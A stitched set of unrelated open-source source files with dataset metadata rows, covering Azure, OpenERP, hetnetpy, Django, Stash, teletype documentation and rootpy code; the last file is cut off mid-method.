match = re.compile('0" value="([^"]+)">([^<]+)<', re.DOTALL | re.IGNORECASE).findall(cathtml)
for catpage, name in match:
catpage = 'http://k18.co/?cat=' + catpage
utils.addDir(name, catpage, 231, '')
xbmcplugin.endOfDirectory(utils.addon_handle)
def Playvid(url, name, download=None):
utils.PLAYVIDEO(url, name, download)
|
gpl-2.0
| -4,485,078,390,973,765,600
| 32.959459
| 152
| 0.655392
| false
| 3.485437
| false
| false
| false
|
AutorestCI/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/application_gateway_url_path_map.py
|
1
|
3397
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayUrlPathMap(SubResource):
"""UrlPathMaps give a url path to the backend mapping information for
PathBasedRouting.
:param id: Resource ID.
:type id: str
:param default_backend_address_pool: Default backend address pool resource
of URL path map.
:type default_backend_address_pool:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param default_backend_http_settings: Default backend http settings
resource of URL path map.
:type default_backend_http_settings:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param default_redirect_configuration: Default redirect configuration
resource of URL path map.
:type default_redirect_configuration:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param path_rules: Path rule of URL path map resource.
:type path_rules:
list[~azure.mgmt.network.v2017_09_01.models.ApplicationGatewayPathRule]
:param provisioning_state: Provisioning state of the backend http settings
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Name of the resource that is unique within a resource group.
This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'default_backend_address_pool': {'key': 'properties.defaultBackendAddressPool', 'type': 'SubResource'},
'default_backend_http_settings': {'key': 'properties.defaultBackendHttpSettings', 'type': 'SubResource'},
'default_redirect_configuration': {'key': 'properties.defaultRedirectConfiguration', 'type': 'SubResource'},
'path_rules': {'key': 'properties.pathRules', 'type': '[ApplicationGatewayPathRule]'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, id=None, default_backend_address_pool=None, default_backend_http_settings=None, default_redirect_configuration=None, path_rules=None, provisioning_state=None, name=None, etag=None, type=None):
super(ApplicationGatewayUrlPathMap, self).__init__(id=id)
self.default_backend_address_pool = default_backend_address_pool
self.default_backend_http_settings = default_backend_http_settings
self.default_redirect_configuration = default_redirect_configuration
self.path_rules = path_rules
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
self.type = type
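# Illustrative sketch (not part of the generated model): constructing a URL
# path map that sends unmatched requests to a default address pool and HTTP
# settings pair. The resource IDs are placeholders, not real Azure resources.
#
#   url_path_map = ApplicationGatewayUrlPathMap(
#       name='pathmap1',
#       default_backend_address_pool=SubResource(id='<pool-resource-id>'),
#       default_backend_http_settings=SubResource(id='<http-settings-resource-id>'),
#       path_rules=[],
#   )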
|
mit
| -8,994,817,424,965,197,000
| 47.528571
| 215
| 0.664999
| false
| 4.137637
| true
| false
| false
|
chengdh/openerp-ktv
|
openerp/addons/ktv_sale/room_operate.py
|
1
|
3418
|
# -*- coding: utf-8 -*-
from osv import osv,fields
from room import room
class room_operate(osv.osv):
    '''
    Room operation class.
    All of the following actions count as room operations:
    1 reservation
    2 regular check-in (open room)
    3 buy time
    4 buy-out
    5 extend time
    6 refund time
    7 change room
    8 merge rooms
    A room is linked to room_operate through cur_room_operate_id, which identifies the operation the room currently corresponds to.
    room_operate has a one2many relation to each of the operations above, so a single room_operate exposes every action performed while the room was open; at checkout, iterate over all of these operations and compute the bill.
    '''
_name = "ktv.room_operate"
    # this object is referenced from other places, so its record name is defined as bill_no
_rec_name = "bill_no"
_description = "包厢操作类,与包厢是many2one的关系"
_columns = {
"operate_date" : fields.datetime('operate_datetime',required = True),
"room_id" : fields.many2one('ktv.room','room_id',required = True),
"bill_no" : fields.char("bill_no",size = 64,required = True,help = "账单号"),
"room_scheduled_ids" : fields.one2many("ktv.room_scheduled","room_operate_id",help="预定信息列表"),
"room_opens_ids" : fields.one2many("ktv.room_opens","room_operate_id",help="开房信息列表"),
}
_defaults = {
'operate_date' : fields.datetime.now,
'bill_no': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'ktv.room_operate'),
}
def process_operate(self,cr,uid,operate_values):
"""
包厢操作统一入口,调用不同业务类的操作
这样设计的好处是隔离了变化,如果需要修改服务端的逻辑,客户端的调用逻辑不用做任何修改
在客户端新增了业务实体调用,只用增加新的实体即可,其他不用做修改
在js端也需要封装同样的调用接口来隔离变化
:params room_id integer 包厢编码
:operate_values 前端传入的业务操作数据
:operate[osv_name] 要调用的实体业务对象名称,比如ktv.room_checkout
调用示例:
开房操作,返回三个参数 1 操作成功的实体对象 2 包厢应修改的状态 3 cron对象,用于处理对包厢的定时操作:
(operate_obj,room_state,cron) = self.pool.get(operate_values['osv_name']).process_operate(cr,uid,opeate_values)
更新当前包厢状态,添加cron对象,返回处理结果
"""
room_id = operate_values['room_id']
(operate_obj,room_state,cron) = self.pool.get(operate_values['osv_name']).process_operate(cr,uid,operate_values)
        # update the room state
self.pool.get('ktv.room').write(cr,uid,room_id,{'state' : room_state})
        # TODO: create the cron object
if cron:
self._create_operate_cron(cr,uid,cron)
room_fields = self.pool.get('ktv.room').fields_get(cr,uid).keys()
room = self.pool.get('ktv.room').read(cr,uid,room_id,room_fields)
        # return two objects: room and room_operate
return {'room' : room,'room_operate' : operate_obj}
def _create_operate_cron(self,cr,uid,cron_vals):
"""
创建cron定时执行任务,在需要定时执行关房任务时,需要执行
:params dict cron_vals 定时任务相关属性
"""
return self.pool.get('ir.cron').create(cr,uid,cron_vals)
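# Illustrative sketch (not part of the original module): how another osv method
# could call the unified entry point above. The cursor `cr`, user id `uid` and
# the operate_values payload are hypothetical; 'osv_name' selects the business
# object that actually handles the operation (e.g. ktv.room_opens).
#
#   values = {'osv_name': 'ktv.room_opens', 'room_id': 1}
#   result = self.pool.get('ktv.room_operate').process_operate(cr, uid, values)
#   result['room']          # refreshed room record, including its new state
#   result['room_operate']  # the business object returned by the operation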
|
agpl-3.0
| -4,107,985,104,135,844,400
| 35.166667
| 120
| 0.621352
| false
| 1.917526
| false
| false
| false
|
dhimmel/hetio
|
hetnetpy/permute.py
|
1
|
9110
|
import collections
import random
import logging
from hetnetpy.hetnet import Graph
def permute_graph(graph, multiplier=10, seed=0, metaedge_to_excluded=dict(), log=False):
"""
Derive a permuted hetnet from an input hetnet. This method applies the
XSwap algorithm separately for each metaedge. Hence, node degree is
preserved for each type of edge. However, edges are randomized / shuffled.
Users are recommended to interrogate the reported statistics to ensure that
edges appear to be sufficiently randomized. Primarily, the number of edges
of a given metaedge that remain unchanged from the original hetnet should
    have reached an asymptote. If the number of unchanged edges has not yet
    stabilized, further randomization is possible with this approach.
Parameters
----------
graph : hetnetpy.hetnet.Graph
Input hetnet to create a permuted derivative from
multiplier : int or float
This is multiplied by the number of edges for each metaedge to
determine the number of swaps to attempt.
seed : int
Seed to initialize Python random number generator. When creating many
permuted hetnets, it's recommended to increment this number, such that
each round of permutation shuffles edges in a different order.
metaedge_to_excluded : dict (metaedge -> set)
Edges to exclude. This argument has not been extensively used in
practice.
log : bool
Whether to log diagnostic INFO via python's logging module.
Returns
-------
permuted_graph : hetnetpy.hetnet.Graph
A permuted hetnet derived from the input graph.
stats : list of dicts
A list where each item is a dictionary of permutation statistics at a
checkpoint for a specific metaedge. These statistics allow tracking the
progress of the permutation as the number of attempted swaps increases.
"""
if log:
logging.info("Creating permuted graph template")
permuted_graph = Graph(graph.metagraph)
for (metanode_identifier, node_identifier), node in graph.node_dict.items():
permuted_graph.add_node(
metanode_identifier, node_identifier, name=node.name, data=node.data
)
if log:
logging.info("Retrieving graph edges")
metaedge_to_edges = graph.get_metaedge_to_edges(exclude_inverts=True)
if log:
logging.info("Adding permuted edges")
all_stats = list()
for metaedge, edges in metaedge_to_edges.items():
if log:
logging.info(metaedge)
excluded_pair_set = metaedge_to_excluded.get(metaedge, set())
pair_list = [(edge.source.get_id(), edge.target.get_id()) for edge in edges]
directed = metaedge.direction != "both"
permuted_pair_list, stats = permute_pair_list(
pair_list,
directed=directed,
multiplier=multiplier,
excluded_pair_set=excluded_pair_set,
seed=seed,
log=log,
)
for stat in stats:
stat["metaedge"] = metaedge
stat["abbrev"] = metaedge.abbrev
all_stats.extend(stats)
for pair in permuted_pair_list:
permuted_graph.add_edge(pair[0], pair[1], metaedge.kind, metaedge.direction)
return permuted_graph, all_stats
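# Illustrative sketch (not part of the original module): permuting an entire
# hetnet. `graph` is assumed to be a hetnetpy.hetnet.Graph built elsewhere; the
# returned copy keeps every node and every node degree, but shuffles the edges
# of each metaedge independently.
#
#   permuted_graph, stats = permute_graph(graph, multiplier=10, seed=0)
#   final_checkpoints = [s for s in stats if s["complete"] == 1.0]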
def permute_pair_list(
pair_list,
directed=False,
multiplier=10,
excluded_pair_set=set(),
seed=0,
log=False,
inplace=False,
):
"""
Permute edges (of a single type) in a graph according to the XSwap function
described in https://doi.org/f3mn58. This method selects two edges and
attempts to swap their endpoints. If the swap would result in a valid edge,
the swap proceeds. Otherwise, the swap is skipped. The end result is that
node degree is preserved, but edges are shuffled, thereby losing their
original meaning.
Parameters
----------
pair_list : list of tuples
List of edges to permute. Each edge is represented as a (source,
target) tuple. source and target represent nodes and can be any Python
objects that define __eq__. In other words, this function does not
assume any specific format for nodes. If the edges are from a bipartite
or directed graph, then all tuples must have the same alignment. For
example, if the edges represent the bipartite Compound-binds-Gene
relationship, all tuples should be of the form (compound, gene) and not
intermixed with (gene, compound) tuples. The only instance where order
of the source and target is not important is for an undirected edge
type where the source and target nodes are of the same type, such as
Gene-interacts-Gene.
directed : bool
Whether the edge should be considered directed. If False, a swap that
creates an a-b edge will be invalid if a b-a edge already exists.
multiplier : int or float
This is multiplied by the number of edges in pair_list to determine the
number of swaps to attempt.
excluded_pair_set : set of tuples:
Set of possible edges to forbid. If a swap would create an edge in this
set, it would be considered invalid and hence skipped.
seed : int
Seed to initialize Python random number generator.
log : bool
Whether to log diagnostic INFO via python's logging module.
inplace : bool
Whether to modify the edge list in place.
Returns
-------
pair_list : list of tuples
The permuted edges, derived from the input pair_list.
stats : list of dicts
A list where each item is a dictionary of permutation statistics at a
checkpoint. Statistics are collected at 10 checkpoints, spaced evenly
by the number of attempts.
"""
random.seed(seed)
if not inplace:
pair_list = pair_list.copy()
pair_set = set(pair_list)
assert len(pair_set) == len(pair_list)
edge_number = len(pair_list)
n_perm = int(edge_number * multiplier)
count_same_edge = 0
count_self_loop = 0
count_duplicate = 0
count_undir_dup = 0
count_excluded = 0
if log:
logging.info(
"{} edges, {} permutations (seed = {}, directed = {}, {} excluded_edges)".format(
edge_number, n_perm, seed, directed, len(excluded_pair_set)
)
)
orig_pair_set = pair_set.copy()
step = max(1, n_perm // 10)
print_at = list(range(step, n_perm, step)) + [n_perm - 1]
stats = list()
for i in range(n_perm):
        # Sample two random edges
i_0 = random.randrange(edge_number)
i_1 = random.randrange(edge_number)
# Same edge selected twice
if i_0 == i_1:
count_same_edge += 1
continue
pair_0 = pair_list.pop(i_0)
pair_1 = pair_list.pop(i_1 - 1 if i_0 < i_1 else i_1)
new_pair_0 = pair_0[0], pair_1[1]
new_pair_1 = pair_1[0], pair_0[1]
valid = False
for pair in new_pair_0, new_pair_1:
if pair[0] == pair[1]:
count_self_loop += 1
break # edge is a self-loop
if pair in pair_set:
count_duplicate += 1
break # edge is a duplicate
if not directed and (pair[1], pair[0]) in pair_set:
count_undir_dup += 1
break # edge is a duplicate
if pair in excluded_pair_set:
count_excluded += 1
break # edge is excluded
else:
# edge passed all validity conditions
valid = True
# If new edges are invalid
if not valid:
for pair in pair_0, pair_1:
pair_list.append(pair)
# If new edges are valid
else:
for pair in pair_0, pair_1:
pair_set.remove(pair)
for pair in new_pair_0, new_pair_1:
pair_set.add(pair)
pair_list.append(pair)
if i in print_at:
stat = collections.OrderedDict()
stat["cumulative_attempts"] = i
index = print_at.index(i)
stat["attempts"] = (
print_at[index] + 1
if index == 0
else print_at[index] - print_at[index - 1]
)
stat["complete"] = (i + 1) / n_perm
stat["unchanged"] = len(orig_pair_set & pair_set) / len(pair_set)
stat["same_edge"] = count_same_edge / stat["attempts"]
stat["self_loop"] = count_self_loop / stat["attempts"]
stat["duplicate"] = count_duplicate / stat["attempts"]
stat["undirected_duplicate"] = count_undir_dup / stat["attempts"]
stat["excluded"] = count_excluded / stat["attempts"]
stats.append(stat)
count_same_edge = 0
count_self_loop = 0
count_duplicate = 0
count_undir_dup = 0
count_excluded = 0
assert len(pair_set) == edge_number
return pair_list, stats
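# Minimal, self-contained demonstration (not part of the original module): it
# permutes a toy, undirected edge list and reports how many edges survived
# unchanged at the final checkpoint. The node labels are hypothetical.
if __name__ == "__main__":
    toy_edges = [("a", "b"), ("a", "c"), ("b", "d"), ("c", "e"), ("d", "f"), ("e", "f")]
    permuted, stats = permute_pair_list(toy_edges, directed=False, multiplier=10, seed=0)
    print("permuted edges:", permuted)
    print("unchanged fraction at final checkpoint:", stats[-1]["unchanged"])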
|
cc0-1.0
| 7,102,797,442,596,513,000
| 36.03252
| 93
| 0.615038
| false
| 4.083371
| false
| false
| false
|
coetzeevs/chiron
|
mysite/polls/views.py
|
1
|
1976
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.template import loader
from .models import Question, Choice
from django.urls import reverse
from django.views import generic
from django.utils import timezone
from django.core.mail import EmailMessage
from django.conf import settings
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
"""
Return the last five published questions (not including those set to be
published in the future).
"""
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
"""
Excludes any questions that aren't published yet.
"""
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def email(request):
email = EmailMessage('hello', 'Hello Johan, Minder OLX en meer ChiChi',settings.EMAIL_HOST_USER, to=['johan.duplessis@olx.com'])
email.send()
return HttpResponse("Hello, world. You're at the polls index.")
def vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
try:
selected_choice = question.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the question voting form.
return render(request, 'polls/detail.html', {
'question': question,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
|
mit
| -8,582,128,274,714,350,000
| 30.380952
| 130
| 0.745951
| false
| 3.509769
| false
| false
| false
|
LACNIC/simon
|
simon-web/simon_app/templatetags/simon_extras.py
|
1
|
2401
|
from django import template
from datetime import datetime
from simon_app.functions import GMTUY
import operator
"""
Module that holds the Simon custom template filters.
"""
register = template.Library()
@register.filter(name="substract")
def substract(value, arg):
"""
Substract
"""
return value - arg
@register.filter(name="divide")
def divide(value, arg):
"""
Float division
"""
return float(value) / float(arg)
@register.filter(name="percentage")
def percentage(value, arg):
"""
Percentage
"""
return 100.0 * divide(value, arg)
@register.filter(name="unit_shortener")
def unit_shortener(value):
"""
Unit converter
"""
try:
int(value)
float(value)
except:
return "N/A"
K = 1000
M = K * K
G = K * M
T = K * G
if value > T:
return "%.1f %s" % (1.0 * value / T, 'T')
if value > G:
return "%.1f %s" % (1.0 * value / G, 'G')
if value > M:
return "%.1f %s" % (1.0 * value / M, 'M')
if value > K:
return "%.1f %s" % (1.0 * value / K, 'K')
return value
@register.filter(name="time_since")
def time_since(value):
"""
:param now:
:return:
"""
td = datetime.now(GMTUY()) - value
print td
if td.days > 1:
return "mas de un dia"
elif td.seconds > 3600:
mins = "%.0f minutos" % ((td.seconds % 3600) / 60)
horas = "%.0f %s" % (td.seconds / 3600, "horas" if td.seconds / 3600 > 1 else "hora")
return "%s %s" % (horas, mins)
elif td.seconds > 60:
return "%.0f minutos" % (td.seconds / 60)
else:
return "%.0f segundos" % td.seconds
@register.filter(name="max")
def max_(value, arg):
"""
:param value:
:param arg:
:return:
"""
if arg == 'v6_rate':
return str(max([v.v6_rate for v in value]))
return "%s %s" % (value, arg)
@register.filter(name="get_by_attribute")
def get_by_attribute(objects, raw_args):
print raw_args
key, value = raw_args.split(' ')
print key, value
func = operator.attrgetter(key)
for o in objects:
if func(o) == value:
return o
class Object():
pass
a = Object()
setattr(a, key, 0)
return a
@register.filter(name="get_attribute")
def get_attribute(object, attr):
func = operator.attrgetter(attr)
return func(object)
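# Illustrative sketch (not part of the original module): how these filters are
# meant to be used from a Django template once this tag library is loaded. The
# variable names are hypothetical.
#
#   {% load simon_extras %}
#   {{ bytes_count|unit_shortener }}                      e.g. "1.5 M"
#   {{ part|percentage:total }}
#   {{ measurements|get_by_attribute:"country_code UY" }}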
|
gpl-2.0
| 4,992,362,165,801,028,000
| 18.208
| 93
| 0.548105
| false
| 3.222819
| false
| false
| false
|
gpailler/AtlassianBot
|
plugins/stash.py
|
1
|
1971
|
# coding: utf-8
import requests
from utils import rest
class Stash(object):
def __init__(self, server):
self.__server = server
def get_stash_branches(self, repos, project, filter):
results = []
for repo in repos:
path = '/rest/api/1.0/projects/{project}/repos/{repo}/branches'\
.format(project=project, repo=repo)
data = {
'filterText': filter,
'details': True,
'limit': 100
}
request = rest.get(self.__server, path, data)
for result in request.json()['values']:
results.append((
repo,
result['id'],
result['displayId'],
result['latestChangeset']))
return results
def branch_merged(self, project, basebranches, repo, branch):
for to in basebranches:
path = ('/rest/api/1.0/projects/{project}/repos/{repo}/'
'compare/changes/').format(project=project, repo=repo)
data = {
'from': branch,
'to': to,
'limit': 1
}
request = rest.get(self.__server, path, data)
if request.status_code != requests.codes.ok:
raise Exception(request.text)
else:
if request.json()['size'] == 0:
return True
return False
def remove_git_branches(self, project, repo, branchkey, changeset):
path = ('/rest/branch-utils/1.0/projects/{project}/repos/{repo}/'
'branches').format(project=project, repo=repo)
data = {
'name': branchkey,
'endPoint': changeset,
'dryRun': False
}
request = rest.delete(self.__server, path, data)
if request.status_code != requests.codes.no_content:
raise Exception(request.text)
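# Illustrative sketch (not part of the original plugin): the clean-up flow the
# three methods above are designed for. `server_config`, the project key and
# the repository/branch names are placeholders.
#
#   stash = Stash(server_config)
#   branches = stash.get_stash_branches(['my-repo'], 'PROJ', 'feature/')
#   for repo, branch_id, display_id, changeset in branches:
#       if stash.branch_merged('PROJ', ['refs/heads/master'], repo, branch_id):
#           stash.remove_git_branches('PROJ', repo, branch_id, changeset)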
|
mit
| -3,836,757,531,418,483,700
| 30.790323
| 76
| 0.499239
| false
| 4.489749
| false
| false
| false
|
samdoshi/teletype
|
utils/docs.py
|
1
|
6073
|
#!/usr/bin/env python3
import sys
from pathlib import Path
import jinja2
import pypandoc
import pytoml as toml
from common import list_ops, list_mods, validate_toml, get_tt_version
if (sys.version_info.major, sys.version_info.minor) < (3, 6):
raise Exception("need Python 3.6 or later")
THIS_FILE = Path(__file__).resolve()
ROOT_DIR = THIS_FILE.parent.parent
TEMPLATE_DIR = ROOT_DIR / "utils" / "templates"
DOCS_DIR = ROOT_DIR / "docs"
OP_DOCS_DIR = DOCS_DIR / "ops"
FONTS_DIR = ROOT_DIR / "utils" / "fonts"
TT_VERSION = get_tt_version()
VERSION_STR = " ".join(["Teletype", TT_VERSION["tag"], TT_VERSION["hash"],
"Documentation"])
env = jinja2.Environment(
autoescape=False,
loader=jinja2.FileSystemLoader(str(TEMPLATE_DIR)),
trim_blocks=True,
lstrip_blocks=True,
cache_size=0,
auto_reload=True
)
# determines the order in which sections are displayed
OPS_SECTIONS = [
"variables",
"hardware",
"patterns",
"controlflow",
"maths",
"metronome",
"delay",
"stack",
"queue",
"turtle",
"grid",
"ansible",
"whitewhale",
"meadowphysics",
"earthsea",
"orca",
"justfriends",
"telex_i",
"telex_o",
"er301",
"fader",
"wslash",
"matrixarchate"
]
def deep_merge_dict(source, destination):
for key, value in source.items():
if isinstance(value, dict):
node = destination.setdefault(key, {})
deep_merge_dict(value, node)
else:
destination[key] = value
return destination
def common_md():
print(f"Pandoc version: {pypandoc.get_pandoc_version()}")
print(f"Using docs directory: {DOCS_DIR}")
print(f"Using ops docs directory: {OP_DOCS_DIR}")
print()
op_table_template = env.get_template("op_table.jinja2.md")
op_extended_template = env.get_template("op_extended.jinja2.md")
output = ""
output += Path(DOCS_DIR / "intro.md") \
.read_text().replace("VERSION", TT_VERSION["tag"][1:]) + "\n\n"
output += Path(DOCS_DIR / "whats_new.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "quickstart.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "keys.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "ops.md").read_text() + "\n\n"
all_ops = set(list_ops()) | set(list_mods())
all_ops_dict = {}
ops_with_docs = set()
for section in OPS_SECTIONS:
md_file = Path(OP_DOCS_DIR, section + ".md")
toml_file = Path(OP_DOCS_DIR, section + ".toml")
output += "\\newpage\n"
if md_file.exists() and md_file.is_file():
print(f"Reading {md_file}")
output += md_file.read_text() + "\n\n"
output += "\n"
if toml_file.exists() and toml_file.is_file():
print(f"Reading {toml_file}")
extended = []
# n.b. Python 3.6 dicts maintain insertion order
ops = toml.loads(toml_file.read_text())
validate_toml(ops)
deep_merge_dict(ops, all_ops_dict)
for key in ops:
if key not in all_ops:
print(f" - WARNING: unknown {key}")
ops_with_docs.add(key)
if "aliases" in ops[key]:
ops_with_docs |= set(ops[key]["aliases"])
if "description" in ops[key]:
render = op_extended_template.render(name=key, **ops[key])
extended.append((key, render))
output += op_table_template.render(ops=ops.values())
output += "\n"
output += "\n".join([e[1] for e in extended]) + "\n\n"
output += Path(DOCS_DIR / "advanced.md").read_text() + "\n\n"
output += "\\appendix\n\n"
output += "# Alphabetical list of OPs and MODs\n\n"
sorted_ops = [kv[1] for kv in sorted(all_ops_dict.items())]
output += op_table_template.render(ops=sorted_ops)
output += "\n\n# Missing documentation\n\n"
missing_ops = all_ops - ops_with_docs
output += ", ".join([f"`{o}`" for o in sorted(missing_ops)]) + "\n\n"
output += Path(ROOT_DIR / "CHANGELOG.md").read_text() + "\n\n"
return output
def main():
if len(sys.argv) <= 1:
sys.exit("Please supply a filename")
input_format = "markdown"
output = common_md()
print()
for arg in sys.argv[1:]:
p = Path(arg).resolve()
print(f"Generating: {p}")
ext = p.suffix
if ext == ".md":
p.write_text(output)
elif ext == ".html":
output = "# " + VERSION_STR + "\n\n" + output
pypandoc.convert_text(
output,
format=input_format,
to="html5",
outputfile=str(p),
extra_args=["--standalone",
"--self-contained",
"--toc",
"--toc-depth=2",
"--css=" + str(TEMPLATE_DIR / "docs.css"),
"--template=" + str(TEMPLATE_DIR /
"template.html5")])
elif ext == ".pdf" or ext == ".tex":
latex_preamble = env.get_template("latex_preamble.jinja2.md")
latex = latex_preamble \
.render(title=VERSION_STR, fonts_dir=FONTS_DIR) + "\n\n"
latex += output
pandoc_version = int(pypandoc.get_pandoc_version()[0])
engine = ("--pdf-engine=xelatex"
if pandoc_version >= 2
else "--latex-engine=xelatex")
pypandoc.convert_text(
latex,
format=input_format,
to=ext[1:],
outputfile=str(p),
extra_args=["--standalone",
"--column=80",
"--toc",
"--toc-depth=2",
engine,
"--variable=papersize:A4"])
if __name__ == "__main__":
main()
|
gpl-2.0
| -4,714,646,216,518,015,000
| 29.671717
| 78
| 0.513091
| false
| 3.526713
| false
| false
| false
|
mylokin/redisext
|
tests/test_expire.py
|
1
|
1260
|
from __future__ import absolute_import
import redisext.counter
import redisext.key
import redisext.serializer
from . import fixture
class ExpireCounter(redisext.counter.Counter, redisext.key.Expire):
EXPIRE = 60
CONNECTION = fixture.Connection
SERIALIZER = redisext.serializer.Numeric
class ExpireCounterTestCase(fixture.TestCase):
def setUp(self):
self.counter = ExpireCounter('key')
self.counter.incr()
self.counter.expire()
def test_expire(self):
self.assertTrue(60 >= self.counter.ttl() > 0)
def test_persist(self):
self.counter.persist()
self.assertEqual(self.counter.ttl(), -1)
class UnspecifiedExpireCounter(redisext.counter.Counter, redisext.key.Expire):
CONNECTION = fixture.Connection
SERIALIZER = redisext.serializer.Numeric
class UnspecifiedExpireCounterTestCase(fixture.TestCase):
def setUp(self):
self.counter = UnspecifiedExpireCounter('key')
def test_expire_unspecified(self):
self.counter.incr()
with self.assertRaises(ValueError):
self.counter.expire()
def test_expire_specified(self):
self.counter.incr()
self.counter.expire(60)
self.assertTrue(60 >= self.counter.ttl() > 0)
|
mit
| -488,243,151,904,911,100
| 25.808511
| 78
| 0.694444
| false
| 3.631124
| true
| false
| false
|
Instanssi/Instanssi.org
|
Instanssi/screenshow/migrations/0003_auto_20210511_0020.py
|
1
|
1515
|
# Generated by Django 3.2.2 on 2021-05-10 21:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('screenshow', '0002_auto_20180711_2110'),
]
operations = [
migrations.AlterField(
model_name='ircmessage',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='message',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='npsong',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='playlistvideo',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='screenconfig',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='sponsor',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
|
mit
| -6,303,775,865,883,706,000
| 34.232558
| 111
| 0.588779
| false
| 4.139344
| false
| false
| false
|
tabalinas/jsgrid-django
|
clients/views.py
|
1
|
1522
|
from django.http import HttpResponse
from django.core import serializers
from django.shortcuts import render
from simple_rest import Resource
from .models import Client
def index(request):
return render(request, 'index.html')
class Clients(Resource):
def get(self, request):
clients = Client.objects.all() \
.filter(name__contains = request.GET.get('name')) \
.filter(address__contains = request.GET.get('address'));
return HttpResponse(self.to_json(clients), content_type = 'application/json', status = 200)
def post(self, request):
Client.objects.create(
name = request.POST.get("name"),
age = request.POST.get("age"),
address = request.POST.get("address"),
married = True if request.POST.get("married") == 'true' else False
)
return HttpResponse(status = 201)
def put(self, request, client_id):
client = Client.objects.get(pk = client_id)
client.name = request.PUT.get("name")
client.age = request.PUT.get("age")
client.address = request.PUT.get("address")
client.married = True if request.PUT.get("married") == 'true' else False
client.save()
return HttpResponse(status = 200)
def delete(self, request, client_id):
client = Client.objects.get(pk = client_id)
client.delete()
return HttpResponse(status = 200)
def to_json(self, objects):
return serializers.serialize('json', objects)
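# --- Illustrative notes (added commentary, not part of the original module) ---
# A minimal sketch of the requests this resource handles, inferred from the code
# above; the field names mirror the Client usage shown here, while the URL paths
# are only assumptions about how the resource might be routed.
#
#   GET    /clients?name=Jo&address=Street   -> JSON list filtered by substring
#   POST   /clients   with form fields name, age, address, married ('true'/'false')
#   PUT    /clients/<id>   with the same fields updates an existing record
#   DELETE /clients/<id>   removes the record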
|
mit
| -5,578,314,184,561,130,000
| 32.822222
| 99
| 0.631406
| false
| 3.994751
| false
| false
| false
|
qbuat/rootpy
|
rootpy/tree/tree.py
|
1
|
33528
|
# Copyright 2012 the rootpy developers
# distributed under the terms of the GNU General Public License
from __future__ import absolute_import
import sys
import re
import fnmatch
import uuid
import ROOT
from .. import log; log = log[__name__]
from .. import asrootpy, QROOT
from ..extern.ordereddict import OrderedDict
from ..context import set_directory, thread_specific_tmprootdir, do_nothing
from ..base import NamedObject
from ..decorators import snake_case_methods, method_file_check, method_file_cd
from ..plotting.base import Plottable
from ..plotting import Hist, Canvas
from ..memory.keepalive import keepalive
from .cut import Cut
from .treebuffer import TreeBuffer
from .treetypes import Scalar, Array, BaseChar
from .model import TreeModel
__all__ = [
'Tree',
'Ntuple',
]
class UserData(object):
pass
class BaseTree(NamedObject):
DRAW_PATTERN = re.compile(
'^(?P<branches>.+?)'
'(?P<redirect>\>\>[\+]?'
'(?P<name>[^\(]+)'
'(?P<binning>.+)?)?$')
def _post_init(self):
"""
The standard rootpy _post_init method that is used to initialize both
new Trees and Trees retrieved from a File.
"""
if not hasattr(self, '_buffer'):
# only set _buffer if model was not specified in the __init__
self._buffer = TreeBuffer()
self.read_branches_on_demand = False
self._branch_cache = {}
self._current_entry = 0
self._always_read = []
self.userdata = UserData()
self._inited = True
def always_read(self, branches):
"""
Always read these branches, even when in caching mode. Maybe you have
caching enabled and there are branches you want to be updated for each
entry even though you never access them directly. This is useful if you
are iterating over an input tree and writing to an output tree sharing
the same TreeBuffer and you want a direct copy of certain branches. If
you have caching enabled but these branches are not specified here and
never accessed then they will never be read from disk, so the values of
branches in memory will remain unchanged.
Parameters
----------
branches : list, tuple
these branches will always be read from disk for every GetEntry
"""
if type(branches) not in (list, tuple):
